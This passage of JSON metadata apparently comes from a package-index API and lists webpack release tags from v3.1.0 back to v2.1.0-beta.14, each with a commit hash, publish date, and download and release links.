lished_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-